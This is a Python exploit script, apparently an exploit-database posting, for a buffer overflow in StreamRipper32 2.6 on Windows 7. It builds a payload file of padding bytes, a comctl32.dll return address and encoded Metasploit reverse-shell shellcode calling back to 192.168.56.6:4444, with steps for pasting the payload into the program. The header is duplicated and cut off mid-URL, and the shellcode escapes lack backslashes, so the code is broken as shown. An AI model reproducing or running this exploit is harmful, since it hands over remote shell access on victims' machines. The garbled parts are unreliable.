#!/usr/bin/python

#Exploit Title: StreamRipper32 Buffer Overflow
#Date: 07/2019
#Exploit Author: Andrey Stoykov (OSCP)
#Tested On: Win7 SP1 x64
#Software Link: http://st #!/usr/bin/python

#Exploit Title: StreamRipper32 Buffer Overflow
#Date: 07/2019
#Exploit Author: Andrey Stoykov (OSCP)
#Tested On: Win7 SP1 x64
#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
#Version: 2.6
#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"

file = open('exploit.txt', 'wb')

#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6 EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "x00x0ax0dxb4xb8xbcxbdxbe" -f c

shellcode = ("xdbxd7xd9x74x24xf4x59x49x49x49x49x49x49x49" +
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6a" +
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42" +
"x32x42x42x30x42x42x41x42x58x50x38x41x42x75" +
"x4ax49x39x6cx48x68x4bx39x53x30x65x50x63x30" +
"x45x30x4fx79x6bx55x64x71x4bx62x42x44x4ex6b" +
"x50x52x44x70x4ex6bx61x42x76x6cx4ex6bx61x42" +
"x52x34x6cx4bx54x32x46x48x56x6fx6ex57x70x4a" +
"x37x56x35x61x79x6fx56x51x4fx30x4cx6cx57x4c" +
"x31x71x71x6cx46x62x46x4cx77x50x6fx31x38x4f" +
"x66x6dx73x31x6bx77x79x72x78x70x66x32x33x67" +
"x6ex6bx43x62x34x50x4cx4bx43x72x75x6cx57x71" +
"x5ax70x6cx4bx61x50x30x78x6fx75x39x50x32x54" +
"x63x7ax36x61x4ax70x36x30x4cx4bx51x58x34x58" +
"x4cx4bx76x38x75x70x53x31x5ax73x79x73x35x6c" +
"x32x69x6ex6bx66x54x4ex6bx56x61x49x46x35x61" +
"x49x6fx74x71x6bx70x4cx6cx49x51x7ax6fx64x4d" +
"x55x51x79x57x54x78x49x70x32x55x58x74x44x43" +
"x73x4dx4bx48x55x6bx33x4dx76x44x33x45x6bx52" +
"x66x38x6cx4bx53x68x44x64x35x51x38x53x73x56" +
"x4cx4bx54x4cx70x4bx4cx4bx32x78x77x6cx35x51" +
"x5ax73x6ex6bx65x54x4cx4bx76x61x7ax70x4ex69" +
"x30x44x44x64x61x34x71x4bx73x6bx53x51x61x49" +
"x62x7ax42x71x4bx4fx59x70x52x78x53x6fx62x7a" +
"x6cx4bx57x62x4ax4bx4fx76x73x6dx51x78x74x73" +
"x36x52x37x70x45x50x52x48x64x37x31x63x35x62" +
"x33x6fx33x64x43x58x62x6cx33x47x36x46x37x77" +
"x39x6fx7ax75x6fx48x6ex70x73x31x35x50x53x30" +
"x45x79x68x44x43x64x46x30x32x48x56x49x6dx50" +
"x72x4bx33x30x39x6fx39x45x50x50x52x70x76x30" +
"x36x30x67x30x46x30x53x70x72x70x51x78x49x7a" +
"x56x6fx39x4fx49x70x69x6fx78x55x6bx39x6bx77" +
"x62x48x49x50x6fx58x54x78x53x36x50x68x73x32" +
"x45x50x66x71x31x4cx4dx59x79x76x42x4ax64x50" +
"x72x76x62x77x65x38x6ex79x6ex45x42x54x73x51" +
"x69x6fx78x55x61x78x35x33x30x6dx51x74x57x70" +
"x6bx39x4dx33x43x67x31x47x36x37x66x51x69x66" +
"x71x7ax75x42x32x79x62x76x59x72x69x6dx52x46" +
"x4bx77x51x54x31x34x65x6cx77x71x55x51x6cx4d" +
"x30x44x74x64x56x70x49x56x57x70x53x74x72x74" +
"x32x70x42x76x50x56x70x56x51x56x32x76x42x6e" +
"x66x36x33x66x73x63x66x36x45x38x64x39x58x4c" +
"x55x6fx4cx46x79x6fx79x45x6ex69x69x70x42x6e" +
"x61x46x77x36x49x6fx30x30x35x38x45x58x4cx47" +
"x45x4dx51x70x79x6fx38x55x4dx6bx4bx50x65x4d" +
"x57x5ax55x5ax73x58x49x36x4cx55x6dx6dx4dx4d" +
"x59x6fx6ax75x77x4cx64x46x73x4cx77x7ax4bx30" +
"x59x6bx59x70x50x75x33x35x6fx4bx61x57x46x73" +
"x62x52x70x6fx61x7ax45x50x33x63x69x6fx78x55" +
"x41x41")


#74302E3F comctl32.DLL
buffer = "A"*256 + "x3fx2ex30x74" + "x90"*10 + shellcode + "C"*(260-256-4-10)
file.write(buffer)
file.close()